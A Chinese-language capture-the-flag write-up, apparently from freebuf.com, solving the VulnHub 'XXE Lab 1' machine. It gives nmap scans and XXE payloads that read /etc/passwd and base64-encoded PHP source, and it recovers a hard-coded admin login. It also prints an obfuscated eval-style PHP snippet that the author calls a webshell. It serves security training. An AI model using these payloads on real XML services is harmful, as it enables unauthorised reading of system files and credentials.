VulnHub-XXE LAB 1 – 作者:ch4ngeba

靶场信息

地址:https://www.vulnhub.com/entry/xxe-lab-1,254/
发布日期:2018年8月8日
目标:获得flag
运行:VMware Workstation 16.x Pro(默认为NAT网络模式)
描述:
Haboob团队针对已发表的论文“ XML外部实体注入-解释和利用” https://www.exploit-db.com/docs/45374制作了此虚拟机,以利用私有网络中的漏洞。我们希望您喜欢挑战!
挑战就在这里:http://ip-address/xxe

前言

使用VMware Workstation 16.x Pro运行,NAT网络模式。过程中有错误的地方欢迎师傅指正〜

一、信息搜集

1. 获取靶机IP

nmap -sP 10.1.0.0/24

得到ip地址为10.1.0.10

1617163320_6063f4386b6857394c412.png!small?1617163321325

2. 端口服务开放信息

nmap -sC -sV -p- 10.1.0.10

1617164118_6063f75675a826c97007b.png!small?1617164119306

检测到80和5355端口开放,且80端口检测到/xxe/* /admin.php两个目录文件,apache版本:Apache/2.4.27

3. 访问ip

是apache配置页面

1617164139_6063f76ba31b9c4cad2c3.png!small?1617164141369

访问http://10.1.0.10/xxe/

1617164236_6063f7cc1893d20e0f35c.png!small

http://10.1.0.10/xxe/admin.php

1617164244_6063f7d48b1d255204137.png!small?1617164245263

二、漏洞探测

1. http://10.1.0.10/xxe/

随便输入用户名密码,登录时抓包得到

1617168924_60640a1c332e32da2e57d.png!small?1617168925396

可以一眼看出数据表单格式是XML,由此可以判断存在XXE漏洞

2. xxe文件读取漏洞

<?xml version=”1.0″?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM “file:///etc/passwd”>]>
<root><name>&xxe;</name><password>admin</password></root>

1617171343_6064138f1cbb86480212e.png!small?1617171344420

三、漏洞利用

1. 读取admin.php

为了避免文件格式乱码,使用base64编码方式读取

<?xml version=”1.0″?>
<!DOCTYPE ANY [  
<!ENTITY xxe SYSTEM “php://filter/read=convert.base64-encode/resource=admin.php”>]><root><name>&xxe;</name><password>admin</password></root>

1617171579_6064147b55e8c7a61d5a1.png!small?1617171580732

得到源码的base64格式,解码后发现用户名和密码的md5值

administhebest

e6e061838856bf47e1de730719fb2609

解码得到明文admin@123

网站:https://pmd5.com/

<?php
  $msg = ”;
  if (isset($_POST[‘login’]) && !empty($_POST[‘username’]) 
     && !empty($_POST[‘password’])) {

     if ($_POST[‘username’] == ‘administhebest’ && 
        md5($_POST[‘password’]) == ‘e6e061838856bf47e1de730719fb2609’) {
        $_SESSION[‘valid’] = true;
        $_SESSION[‘timeout’] = time();
        $_SESSION[‘username’] = ‘administhebest’;
        
      echo “You have entered valid use name and password <br />”;
$flag = “Here is the <a style=’color:FF0000;’ href=’/flagmeout.php’>Flag</a>”;
echo $flag;
     }else {
        $msg = ‘Maybe Later’;
     }
  }
?>

2. 登录

1617176318_606426fe7c328e08f1282.png!small?1617176319670

点击flag是404

1617176445_6064277d03109c60e5381.png!small?1617176446165

查看源码,超链接处是flagmeout.php

1617176477_6064279d699ff5c953e47.png!small?1617176478673

3. 在xxe.php页面读取flagmeout.php

<?xml version=”1.0″?>
<!DOCTYPE ANY [  
<!ENTITY xxe SYSTEM “php://filter/read=convert.base64-encode/resource=flagmeout.php”>]><root><name>&xxe;</name><password>admin</password></root>

1617176482_606427a2e33d5733de0ed.png!small?1617176484371

得到内容进行base64解码

<?php
$flag = “<!– the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) –>”;
echo $flag;
?>

对JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5进行base32解码得到

L2V0Yy8uZmxhZy5waHA=

base64解得到

/etc/.flag.php

4. 读取flag

<?xml version=”1.0″?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM “file:///etc/.flag.php”>]>
<root><name>&xxe;</name><password>admin</password></root>

1617176742_606428a6e2173fd7dc68f.png!small?1617176744179

得到

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__(‘$_=”‘.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'”‘);$__($_);

这是php的webshell,添加<?php?>保存到文件进行运行,php版本不能太高,我用7.2报错了

<?php
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__(‘$_=”‘.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'”‘);$__($_);
?>

得到flag

SAFCSP{xxe_is_so_easy}

1617177508_60642ba49f619bb53fd85.png!small?1617177509797

总结

最简单的xxe

来源:freebuf.com 2021-04-01 21:10:37 by: ch4ngeba

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论